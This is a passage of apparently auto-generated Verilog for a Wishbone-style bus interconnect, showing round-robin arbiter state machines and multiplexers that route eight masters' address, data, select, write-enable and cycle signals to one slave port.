                    if ( s1_msel_arb2_req[6] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[7] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[0] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[1] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[2] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[3] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant5:
        begin
            if (  !( s1_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[6] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[7] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[0] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[1] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[2] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[3] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[4] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant6:
        begin
            if (  !( s1_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[7] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[0] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[1] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[2] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[3] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[4] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[5] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb2_grant7:
        begin
            if (  !( s1_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s1_msel_arb2_req[0] ) 
                begin
                    s1_msel_arb2_next_state = s1_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s1_msel_arb2_req[1] ) 
                    begin
                        s1_msel_arb2_next_state = s1_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s1_msel_arb2_req[2] ) 
                        begin
                            s1_msel_arb2_next_state = s1_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s1_msel_arb2_req[3] ) 
                            begin
                                s1_msel_arb2_next_state = s1_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s1_msel_arb2_req[4] ) 
                                begin
                                    s1_msel_arb2_next_state = s1_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb2_req[5] ) 
                                    begin
                                        s1_msel_arb2_next_state = s1_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb2_req[6] ) 
                                        begin
                                            s1_msel_arb2_next_state = s1_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s1_msel_arb3_req = { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd3 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd3 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd3 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd3 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd3 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd3 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd3 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s1_msel_arb3_state <= s1_msel_arb3_grant0;
        end
        else
        begin 
            s1_msel_arb3_state <= s1_msel_arb3_next_state;
        end
    end
    always @ (  s1_msel_arb3_state or  { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd3 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd3 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd3 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd3 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd3 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd3 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd3 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s1_msel_arb3_next_state = s1_msel_arb3_state;
        case ( s1_msel_arb3_state ) 
        s1_msel_arb3_grant0:
        begin
            if (  !( s1_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[1] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[2] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[3] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[4] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[5] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[6] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[7] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant1:
        begin
            if (  !( s1_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[2] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[3] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[4] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[5] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[6] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[7] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[0] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant2:
        begin
            if (  !( s1_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[3] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[4] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[5] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[6] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[7] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[0] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[1] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant3:
        begin
            if (  !( s1_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[4] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[5] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[6] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[7] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[0] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[1] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[2] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant4:
        begin
            if (  !( s1_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[5] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[6] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[7] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[0] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[1] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[2] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[3] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant5:
        begin
            if (  !( s1_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[6] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[7] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[0] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[1] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[2] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[3] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[4] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant6:
        begin
            if (  !( s1_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[7] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[0] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[1] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[2] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[3] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[4] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[5] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb3_grant7:
        begin
            if (  !( s1_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s1_msel_arb3_req[0] ) 
                begin
                    s1_msel_arb3_next_state = s1_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s1_msel_arb3_req[1] ) 
                    begin
                        s1_msel_arb3_next_state = s1_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s1_msel_arb3_req[2] ) 
                        begin
                            s1_msel_arb3_next_state = s1_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s1_msel_arb3_req[3] ) 
                            begin
                                s1_msel_arb3_next_state = s1_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s1_msel_arb3_req[4] ) 
                                begin
                                    s1_msel_arb3_next_state = s1_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb3_req[5] ) 
                                    begin
                                        s1_msel_arb3_next_state = s1_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb3_req[6] ) 
                                        begin
                                            s1_msel_arb3_next_state = s1_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s1_msel_pri_out or  s1_msel_arb0_state or  s1_msel_arb1_state)
    begin
        if ( s1_msel_pri_out[0] ) 
        begin
            s1_msel_sel1 = s1_msel_arb1_state;
        end
        else
        begin 
            s1_msel_sel1 = s1_msel_arb0_state;
        end
    end
    always @ (  s1_msel_pri_out or  s1_msel_arb0_state or  s1_msel_arb1_state or  s1_msel_arb2_state or  s1_msel_arb3_state)
    begin
        case ( s1_msel_pri_out ) 
        2'd0:
        begin
            s1_msel_sel2 = s1_msel_arb0_state;
        end
        2'd1:
        begin
            s1_msel_sel2 = s1_msel_arb1_state;
        end
        2'd2:
        begin
            s1_msel_sel2 = s1_msel_arb2_state;
        end
        2'd3:
        begin
            s1_msel_sel2 = s1_msel_arb3_state;
        end
        endcase
    end
    assign s1_mast_sel = ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s1_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s1_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s1_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s1_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s1_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s1_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s1_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s1_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s1_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s1_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s1_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s1_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s1_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s1_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s1_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s1_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s1_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s1_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s1_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s1_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s1_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s1_m0_data_o = s1_data_i;
    assign s1_m1_data_o = s1_data_i;
    assign s1_m2_data_o = s1_data_i;
    assign s1_m3_data_o = s1_data_i;
    assign s1_m4_data_o = s1_data_i;
    assign s1_m5_data_o = s1_data_i;
    assign s1_m6_data_o = s1_data_i;
    assign s1_m7_data_o = s1_data_i;
    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s1_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s1_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s1_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s1_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s1_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s1_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s1_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s1_m0_cyc_r <= m0_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m1_cyc_r <= m1_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m2_cyc_r <= m2_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m3_cyc_r <= m3_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m4_cyc_r <= m4_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m5_cyc_r <= m5_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m6_cyc_r <= m6_s1_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s1_m7_cyc_r <= m7_s1_cyc_o;
    end
    always @ (  ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) or  m0_s1_cyc_o or  m1_s1_cyc_o or  m2_s1_cyc_o or  m3_s1_cyc_o or  m4_s1_cyc_o or  m5_s1_cyc_o or  m6_s1_cyc_o or  m7_s1_cyc_o or  s1_m0_cyc_r or  s1_m1_cyc_r or  s1_m2_cyc_r or  s1_m3_cyc_r or  s1_m4_cyc_r or  s1_m5_cyc_r or  s1_m6_cyc_r or  s1_m7_cyc_r)
    begin
        case ( ( ( ( s1_pri_sel == 2'd0 ) ) ? ( s1_arb_state ) : ( ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( s1_msel_arb0_state ) : ( ( ( ( s1_msel_pri_sel == 2'd1 ) ) ? ( s1_msel_sel1 ) : ( s1_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s1_wb_cyc_o = ( m0_s1_cyc_o & s1_m0_cyc_r );
        end
        3'd1:
        begin
            s1_wb_cyc_o = ( m1_s1_cyc_o & s1_m1_cyc_r );
        end
        3'd2:
        begin
            s1_wb_cyc_o = ( m2_s1_cyc_o & s1_m2_cyc_r );
        end
        3'd3:
        begin
            s1_wb_cyc_o = ( m3_s1_cyc_o & s1_m3_cyc_r );
        end
        3'd4:
        begin
            s1_wb_cyc_o = ( m4_s1_cyc_o & s1_m4_cyc_r );
        end
        3'd5:
        begin
            s1_wb_cyc_o = ( m5_s1_cyc_o & s1_m5_cyc_r );
        end
        3'd6:
        begin
            s1_wb_cyc_o = ( m6_s1_cyc_o & s1_m6_cyc_r );
        end
        3'd7:
        begin
            s1_wb_cyc_o = ( m7_s1_cyc_o & s1_m7_cyc_r );
        end
        endcase
    end
